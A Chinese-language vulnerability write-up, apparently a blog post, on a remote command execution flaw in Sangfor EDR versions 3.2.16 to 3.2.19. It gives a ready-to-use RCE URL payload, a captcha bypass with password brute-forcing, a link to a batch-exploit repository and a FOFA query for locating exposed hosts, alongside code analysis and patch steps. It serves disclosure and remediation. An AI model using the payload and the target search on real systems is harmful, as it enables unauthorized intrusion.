深信服EDR遠程命令執行

0x00簡介

深信服EDR屬於終端安全產品部，是深信服公司在安全業務的戰略級投入產品。終端安全部門負責下一代終端安全解決方案的產品研發，基於先進的AI技術和高效的安全領域經驗， 建設深信服整體安全解決方案的端點響應能力，與雲、網、端產品聯動，構建面向未來、有效防禦的閉環體系。

0x01利用方法

1.https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes=system&host=id

2.linux讀取文件

3.驗證碼繞過

// 校驗驗證碼

if (!ldb_run_at_console()) {

if (isset($_REQUEST["captcha"])

|| $_REQUEST["captcha"] != base64_decode("M...

echo "<font color=&39;><b>驗證碼不對，請輸入..."

return;

}

}

先輸入幾次錯誤密碼，把驗證碼弄出來後，開啟Burp（抓包工具）爆破密碼即可，只要驗證碼第一次輸入對後不為空，即可繞過。

4. 批量利用方法

在GitHub上已經有大佬放出批量攻擊的exp

https://github.com/A2gel/sangfor-edr-exploit

請勿嘗試，非法攻擊是違法的，請誤去觸犯法律，如作他用所承受的法律責任一概與作者無關

0x02搜索相關漏洞方法

Fofa地址：https://fofa.so/

使用fofa搜尋引擎搜索：body="終端檢測響應平臺"

0x03漏洞分析

1.RCE漏洞

echo "<p><b>Log Helper</b></p>";

$show_form($_REQUEST);

跟入show_form

/**

* 顯示錶單

* @param array $params 請求參數

* @return

*/

$show_form = function($params) use(&$strip_slashes, &$show_input) {

extract($params);

$host = isset($host) ? $strip_slashes($host) : "127.0.0.1";

經典的php變量覆蓋漏洞，使用grep搜索一下

tools目錄下全部都是變量覆蓋漏洞，單純只防禦網上那個poc是沒有用的。

2.任意文件下載漏洞

可以看到代碼沒有任何的過慮

3.驗證碼繞過

0x03影響範圍

受此漏洞影響的版本僅包括EDR

v3.2.16

v3.2.17

v3.2.19

0x04修複方式

目前，深信服已經發布升級版本和補丁，更新至v3.2.21版本或升級補丁即可修復該問題並增強其他安全機制。

1.深信服已通過在線升級方式推送補丁包修復該漏洞，開啟在線升級功能可自動修復該漏洞。

2.針對無法在線升級的用戶，深信服技術服務人員將主動協助用戶完成EDR版本升級或補丁修復工作。同時，用戶可通過以下連結下載升級安裝包來完成EDR的升級工作：

https://bbs.sangfor.com.cn/plugin.php?id=service:download&action=view&fid=100000022878128#/100000035115623/all/undefined

下載升級安裝包後打開EDR管理平臺，在系統管理--升級管理--平臺和終端升級界面中導入該升級安裝包，導入後管理平臺和終端將自動升級至v3.2.21版本。

參考文章：

https://www.cnblogs.com/potatsoSec/p/13520546.html

https://mp.weixin.qq.com/s/nAEqjeCm34t1yD5Kh7ZJxA

免責申明：

本項目僅進行信息搜集，漏洞探測工作，無漏洞利用、攻擊性行為，發文初衷為僅為方便安全人員對授權項目完成測試工作和學習交流使用。 請使用者遵守當地相關法律，勿用於非授權測試，勿用於非授權測試，勿用於非授權測試~~（重要的事情說三遍）~~，如作他用所承受的法律責任一概與東塔安全學院無關！！！